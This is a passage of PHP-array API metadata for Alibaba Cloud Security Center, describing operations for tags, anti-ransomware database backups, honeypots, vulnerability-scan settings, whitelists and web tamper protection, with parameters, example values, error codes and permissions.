'string', 'example' => '0E147337-5B0B-5776-B0B6-D569DBA8F60F', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'ModifyStrategyTarget', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyStrategyTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyStrategyTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"0E147337-5B0B-5776-B0B6-D569DBA8F60F\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 0E147337-5B0B-5776-B0B6-D569DBA8F60F\\n","errorExample":""}]', ], 'ModifyTagWithUuid' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92395', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'UuidList', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'e2737dc3-78f4-4653-a986-dc5fad4b****,c189f0e3-df22-42d5-a73d-02c05667****', 'title' => ''], ], [ 'name' => 'TagList', 'in' => 'query', 'schema' => ['description' => 'The names of the tags that you want to manage. Separate multiple tag names with commas (,).'."\n" ."\n" .'> You can call the [DescribeGroupedTags](~~DescribeGroupedTags~~) operation to query the names of tags.'."\n", 'type' => 'string', 'required' => true, 'example' => 'ac,ad', 'title' => ''], ], [ 'name' => 'TagId', 'in' => 'query', 'schema' => ['description' => 'The ID of the tag that you want to manage.'."\n" ."\n" .'> You can call the [DescribeGroupedTags](~~DescribeGroupedTags~~) operation to query the IDs of tags.'."\n", 'type' => 'string', 'required' => false, 'example' => '3897941', 'title' => ''], ], [ 'name' => 'MachineTypes', 'in' => 'query', 'schema' => ['description' => 'The type of the asset to query. If you do not specify this parameter, the tags of all asset types are queried. Valid values:'."\n" ."\n" .'* **ecs**: server'."\n" .'* **cloud_product**: Alibaba Cloud service'."\n", 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The details of the server for which you want to manage the tag. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **Target**: the UUID of the server that you want to add or remove.'."\n" ."\n" .'* **targetType**: the method by which the server is added. Valid values:'."\n" ."\n" .' * **uuid**: by server'."\n" .' * **groupId**: by server group'."\n" ."\n" .'* **flag**: the operation that you want to perform on the server. Valid values:'."\n" ."\n" .' * **del**: removes the tag from the server.'."\n" .' * **add**: adds the tag to the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"target":"inet-7c676676-06fa-432e-90fb-b802e5d6****","targetType":"uuid","flag":"add"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '70C4B40D-D55E-4B7B-9992-8535E396B2F4', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'MissingTagList', 'errorMessage' => 'TagList is mandatory for this action.', 'description' => 'TagList is mandatory for this action.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'ModifyTagWithUuid', 'summary' => 'Modifies the names of the tags that are added to assets, or modifies the tags for assets.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyTagWithUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyTagWithUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"70C4B40D-D55E-4B7B-9992-8535E396B2F4\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 70C4B40D-D55E-4B7B-9992-8535E396B2F4\\n","errorExample":""}]', ], 'ModifyUniBackupPolicy' => [ 'summary' => 'Modifies an anti-ransomware backup policy for databases.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware backup policy for databases.'."\n" .'>You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'PolicyName', 'in' => 'query', 'schema' => ['description' => 'The name of the anti-ransomware backup policy for databases.', 'type' => 'string', 'required' => false, 'example' => 'databak', 'title' => ''], ], [ 'name' => 'Retention', 'in' => 'query', 'schema' => ['description' => 'The number of days for which backup snapshots are retained.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], [ 'name' => 'SpeedLimiter', 'in' => 'query', 'schema' => ['description' => 'The network bandwidth throttling for backup network bandwidth. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1048576', 'title' => ''], ], [ 'name' => 'AccountName', 'in' => 'query', 'schema' => ['description' => 'The username of the database account.', 'type' => 'string', 'required' => false, 'example' => 'sa', 'title' => ''], ], [ 'name' => 'AccountPassword', 'in' => 'query', 'schema' => ['description' => 'The password of the database account.', 'type' => 'string', 'required' => false, 'example' => 'Sa@****', 'title' => ''], ], [ 'name' => 'FullPlan', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The full backup policy. The value is in JSON format and contains the following fields:'."\n" ."\n" .'- **start**: the backup start time.'."\n" .'- **interval**: the interval.'."\n" .'- **type**: the unit of the interval.'."\n" .'- **days**: the days of the week on which the backup is performed.', 'type' => 'object', 'required' => false, 'example' => '{"days":[4],"interval":1,"planType":"weekly","startTime":"22:00:00"}', 'title' => ''], ], [ 'name' => 'IncPlan', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The incremental backup policy. The value is in JSON format and contains the following fields:'."\n" .'- **start**: the backup start time.'."\n" .'- **interval**: the interval.'."\n" .'- **type**: the unit of the interval.'."\n" .'- **days**: the days of the week on which the backup is performed.', 'type' => 'object', 'required' => false, 'example' => '{"interval":1,"planType":"daily","startTime":"23:30:00"}', 'title' => ''], ], [ 'name' => 'PolicyStatus', 'in' => 'query', 'schema' => ['description' => 'The status of the policy. Valid values:'."\n" .'- **enabled**: The policy is enabled.'."\n" .'- **disabled**: The policy is disabled.', 'type' => 'string', 'required' => false, 'example' => 'enabled', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3F6FAB39-5AF7-5B2C-A17D-16D52AE0****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'FailedToActivateUniBackupInstance', 'errorMessage' => 'Failed to activate unbackup instance.', 'description' => ''], ['errorCode' => 'AntiRansomwareCapacityUseUp', 'errorMessage' => 'anti ransomware capacity use up', 'description' => ''], ['errorCode' => 'InvalidParam', 'errorMessage' => 'There was an error with your request.', 'description' => ''], ['errorCode' => 'UniBackupPlanNotFound', 'errorMessage' => 'The backup plan cannot be found.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update anti-ransomware policy for databases', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyUniBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyUniBackupPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3F6FAB39-5AF7-5B2C-A17D-16D52AE0****\\"\\n}","type":"json"}]', ], 'ModifyVpcHoneyPot' => [ 'summary' => 'Enables or disables a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92397', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], 'autoTest' => false, ], 'parameters' => [ [ 'name' => 'VpcId', 'in' => 'query', 'schema' => ['description' => 'The ID of the virtual private cloud (VPC) on which the honeypot is deployed.'."\n" ."\n" .'> You can call the [DescribeVpcHoneyPotList](~~DescribeVpcHoneyPotList~~) operation to query the IDs of VPCs.'."\n", 'type' => 'string', 'required' => true, 'example' => 'vpc-d7o009q63fqy21r8u****', 'title' => ''], ], [ 'name' => 'HoneyPotAction', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable or disable the honeypot. Valid values:'."\n" ."\n" .'* **disable**'."\n" .'* **enable**'."\n", 'type' => 'string', 'required' => true, 'example' => 'disable', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '8158FE9E-19BE-42D6-9F7A-9BE34A2DE1D5', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['noSubstitutionReason' => '无替代API,历史原因导致该API被标记为弃用。'], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"8158FE9E-19BE-42D6-9F7A-9BE34A2DE1D5\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 8158FE9E-19BE-42D6-9F7A-9BE34A2DE1D5\\n","errorExample":""}]', 'title' => 'ModifyVpcHoneyPot', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyVpcHoneyPot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ModifyVulConfig' => [ 'summary' => 'Modifies the vulnerability scanning switch configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '101933', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to modify. Valid values:'."\n" ."\n" .'- **cve**: Linux vulnerability'."\n" .'- **sys**: Windows vulnerability'."\n" .'- **cms**: WebCMS vulnerability'."\n" .'- **emg**: emergency vulnerability'."\n" .'- **app**: application vulnerability'."\n" .'- **yum**: YUM/APT source configuration'."\n" .'- **scanMode**: real risk.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable or disable vulnerability detection. Valid values:'."\n" ."\n" .'- **on**: Enable vulnerability detection.'."\n" .'- **off**: Disable vulnerability detection.'."\n" ."\n" .'> If the type is set to real risk, valid values:'."\n" .'> - **real**: Real risk vulnerabilities.'."\n" .'> - **all**: All vulnerabilities.', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '24DDBE06-58FF-5E5E-9241-D2010D7913C1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify vulnerability scanning switch configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyVulConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyVulConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24DDBE06-58FF-5E5E-9241-D2010D7913C1\\"\\n}","type":"json"}]', ], 'ModifyVulTarget' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The configuration target. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **vulType**: The vulnerability type. Valid values:'."\n" .' - **cve**: Linux software vulnerability.'."\n" .' - **sys**: Windows system vulnerability.'."\n" .' - **cms**: Web-CMS vulnerability.'."\n" .' - **emg**: Emergency vulnerability.', 'type' => 'string', 'required' => false, 'example' => '{\\"vulType\\":\\"sys\\"}', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The operation target. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **target**: The UUID of the target machine.'."\n" .'- **targetType**: The target type. Fixed value: uuid.'."\n" .'- **flag**: The flag. Valid values:'."\n" .' - **add**: Selected.'."\n" .' - **del**: Deselected.', 'type' => 'string', 'required' => false, 'example' => '[{\\"target\\": \\"9cd5c684-7201-4de5-ad2c-cea89a5e****\\", \\"targetType\\": \\"uuid\\", \\"flag\\": \\"add\\"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '38597320-A990-5444-9A4C-7A1269610C2A', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify machine-level toggle settings for vulnerability scanning', 'summary' => 'Modifies the machine-level toggle settings for vulnerability scanning.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyVulTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyVulTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"38597320-A990-5444-9A4C-7A1269610C2A\\"\\n}","type":"json"}]', ], 'ModifyVulTargetConfig' => [ 'summary' => 'Configures the vulnerability detection settings for a single server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability detection to configure. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **emg**: urgent vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to configure.', 'type' => 'string', 'required' => true, 'example' => 'inet-7c676676-06fa-442e-90fb-b802e5d6****', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable or disable vulnerability detection. Valid values:'."\n" ."\n" .'- **on**: Enable vulnerability detection.'."\n" .'- **off**: Disable vulnerability detection.', 'type' => 'string', 'required' => true, 'example' => 'off', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1FF908BA-ADD8-5138-8595-614C6E3C6658', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Configure vulnerability detection settings for a single server', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyVulTargetConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyVulTargetConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1FF908BA-ADD8-5138-8595-614C6E3C6658\\"\\n}","type":"json"}]', ], 'ModifyVulWhitelistTarget' => [ 'summary' => 'Modifies the servers that are added to a vulnerability whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '42.120.75.150', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the whitelist.'."\n" ."\n" .'> You can call the [DescribeVulWhitelist](~~DescribeVulWhitelist~~) operation to query the IDs of whitelists.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2533681', 'title' => ''], ], [ 'name' => 'TargetInfo', 'in' => 'query', 'schema' => ['description' => 'The applicable scope of the whitelist. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **type**: the type of the applicable scope. Valid values:'."\n" ."\n" .' * **GroupId**: the ID of a server group'."\n" .' * **Uuid**: the UUID of a server'."\n" ."\n" .'* **uuids**: the UUIDs of servers'."\n" ."\n" .'* **groupIds**: the IDs of server groups'."\n" ."\n" .'> If you leave this parameter empty, all servers are added to the whitelist. If you set the **type** field to **GroupId**, you must also specify the **groupIds** field. If you set the **type** field to **Uuid**, you must also specify the **uuids** field.'."\n", 'type' => 'string', 'required' => false, 'example' => '{'."\n" .' "type": "GroupId",'."\n" .' "uuids": [],'."\n" .' "groupIds": ['."\n" .' 10782678'."\n" .' ]'."\n" .'}', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason why you add the server to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => '1221', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '896AC4F0-C881-502B-BFC7-4751C5E3DEAA', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyVulWhitelistTarget', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyVulWhitelistTarget', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'VulWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:vulwhitelist/{#VulWhitelistId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"896AC4F0-C881-502B-BFC7-4751C5E3DEAA\\"\\n}","type":"json"}]', ], 'ModifyWebLockCreateConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92400', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '39.170.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server for which you want to add a protected directory.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of the server.', 'type' => 'string', 'required' => true, 'example' => 'inet-12345****', 'title' => ''], ], [ 'name' => 'Dir', 'in' => 'query', 'schema' => ['description' => 'The protected directory.', 'type' => 'string', 'required' => true, 'example' => '/home/admin/tomcat', 'title' => ''], ], [ 'name' => 'ExclusiveDir', 'in' => 'query', 'schema' => ['description' => 'The folder to exclude from web tamper proofing protection.'."\n" .'> This parameter is required when the Defense mode **Mode** is set to **blacklist** pattern.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/test', 'title' => ''], ], [ 'name' => 'ExclusiveFileType', 'in' => 'query', 'schema' => ['description' => 'The file types to exclude from web tamper proofing protection. Separate multiple file types with semicolons (;). Valid values:'."\n" .'- php'."\n" .'- jsp'."\n" .'- asp'."\n" .'- aspx'."\n" .'- js'."\n" .'- cgi'."\n" .'- html'."\n" .'- htm'."\n" .'- xml'."\n" .'- shtml'."\n" .'- shtm'."\n" .'- jpg'."\n" .'- gif'."\n" .'- png'."\n" ."\n" .'> This parameter is required when the Defense mode **Mode** is set to **blacklist** pattern.', 'type' => 'string', 'required' => false, 'example' => 'jpg', 'title' => ''], ], [ 'name' => 'LocalBackupDir', 'in' => 'query', 'schema' => ['description' => 'The local backup path used for secure backup of the protected directory.', 'type' => 'string', 'required' => true, 'example' => '/usr/local/backup', 'title' => ''], ], [ 'name' => 'Mode', 'in' => 'query', 'schema' => ['description' => 'The protection directory mode. Valid values:'."\n" .'- **whitelist**: whitelist mode. Protects only the specified directories and file types.'."\n" .'- **blacklist**: blacklist mode. Protects all subdirectories, file types, and specified files under the protected directory that are not excluded.', 'type' => 'string', 'required' => false, 'example' => 'whitelist', 'title' => ''], ], [ 'name' => 'InclusiveFileType', 'in' => 'query', 'schema' => ['description' => 'The file types to protect with web tamper proofing. Separate multiple file types with semicolons (;). Valid values:'."\n" .'- php'."\n" .'- jsp'."\n" .'- asp'."\n" .'- aspx'."\n" .'- js'."\n" .'- cgi'."\n" .'- html'."\n" .'- htm'."\n" .'- xml'."\n" .'- shtml'."\n" .'- shtm'."\n" .'- jpg'."\n" .'- gif'."\n" .'- png'."\n" ."\n" .'> This parameter is required when the Defense mode **Mode** is set to **whitelist** pattern.', 'type' => 'string', 'required' => false, 'example' => 'jpg', 'title' => ''], ], [ 'name' => 'ExclusiveFile', 'in' => 'query', 'schema' => ['description' => 'The file to exclude from web tamper proofing protection.'."\n" .'> This parameter is required when the Defense mode **Mode** is set to **blacklist** pattern.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/apache.log', 'title' => ''], ], [ 'name' => 'InclusiveFile', 'in' => 'query', 'schema' => ['description' => 'The file to protect.'."\n" .'> This parameter is required when the Defense mode **Mode** is set to **whitelist** pattern.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/test.log', 'title' => ''], ], [ 'name' => 'DefenceMode', 'in' => 'query', 'schema' => ['description' => 'The defense mode. Valid values:'."\n" ."\n" .'- **block**: Block mode.'."\n" .'- **audit**: Alert mode.', 'type' => 'string', 'required' => true, 'example' => 'block', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D9354C1A-D709-4873-9AAE-41513327B247', 'title' => ''], 'ConfigId' => ['description' => 'The ID of the protected directory configuration.', 'type' => 'string', 'example' => '1404656', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'DuplicatedDirectory', 'errorMessage' => 'Duplicated directory', 'description' => ''], ['errorCode' => 'BeyondConfLimit', 'errorMessage' => 'Beyond maxim protect directory count.', 'description' => ''], ['errorCode' => 'ParentOrSubDirectoryProtected', 'errorMessage' => 'Parent or child directories have been protected.', 'description' => ''], ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Add a protected directory for a specified server', 'summary' => 'Adds a protected directory for a specified server.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockCreateConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockCreateConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockConfig', 'arn' => 